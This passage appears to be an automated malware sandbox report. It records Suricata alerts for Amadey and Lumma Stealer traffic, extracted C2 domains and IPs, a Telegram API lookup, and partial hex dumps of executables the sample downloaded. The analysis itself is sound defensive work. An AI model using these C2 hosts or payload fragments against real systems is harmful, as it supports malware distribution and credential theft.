Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49822 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49849 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49843 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49786 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49868 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49889 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49911 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49908 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49926 -> 212.193.31.8:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49930 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49842 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49867 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49810 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49810 -> 104.21.67.146:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: treehoneyi.click
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor IPs: 185.215.113.43
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:10 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:22 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Thu, 19 Dec 2024 20:35:58 GMTConnection: keep-aliveETag: "676483ae-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 6b 63 61 7a 62 6f 00 f0 19 00 00 50 2f 00 00 e2 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 74 6c 6c 6f 7a 63 76 00 10 00 00 00 40 49 00 00 06 00 00 00 40 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:30 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 e0 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 18 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:37 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:43 GMTContent-Type: application/octet-streamContent-Length: 4468736Last-Modified: Sat, 21 Dec 2024 11:08:34 GMTConnection: keep-aliveETag: "6766a1b2-443000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 09 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 56 48 00 00 fc 76 00 00 32 00 00 00 b0 c8 00 00 10 00 00 00 70 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 c8 00 00 04 00 00 64 56 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 70 74 00 73 00 00 00 00 60 74 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 95 c8 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 c8 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 74 00 00 10 00 00 00 4c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 60 74 00 00 02 00 00 00 5c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 74 00 00 02 00 00 00 5e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 38 00 00 80 74 00 00 02 00 00 00 60 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 66 6b 72 72 6f 6d 6b 00 b0 1b 00 00 f0 ac 00 00 a8 1b 00 00 62 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 67 68 6a 69 6a 6c 76 00 10 00 00 00 a0 c8 00 00 04 00 00 00 0a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 c8 00 00 22 00 00 00 0e 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:15:56 GMTContent-Type: application/octet-streamContent-Length: 1374720Last-Modified: Thu, 19 Dec 2024 17:14:58 GMTConnection: keep-aliveETag: "67645492-14fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 e0 68 17 44 00 8c 14 00 e1 14 00 00 e0 00 26 03 0b 01 02 26 00 c8 0b 00 00 f6 14 00 00 04 00 00 80 14 00 00 00 10 00 00 00 e0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 5c 55 1a 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 14 00 08 1c 00 00 00 90 14 00 2c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 bc 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 12 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 54 14 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 c7 0b 00 00 10 00 00 00 c8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 48 01 00 00 00 e0 0b 00 00 02 00 00 00 cc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 98 a1 06 00 00 f0 0b 00 00 a2 06 00 00 ce 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 65 68 5f 66 72 61 6d ec 94 01 00 00 a0 12 00 00 96 01 00 00 70 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 34 02 00 00 00 40 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 08 1c 00 00 00 50 14 00 00 1e 00 00 00 06 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 70 14 00 00 02 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 80 14 00 00 02 00 00 00 26 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 2c 6c 00 00 00 90 14 00 00 6e 00 00 00 28 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 63 00 00 00 00 15 00 00 64 00 00 00 96 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 11:16:03 GMTContent-Type: application/octet-streamContent-Length: 22016Last-Modified: Thu, 19 Dec 2024 14:25:14 GMTConnection: keep-aliveETag: "67642cca-5600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 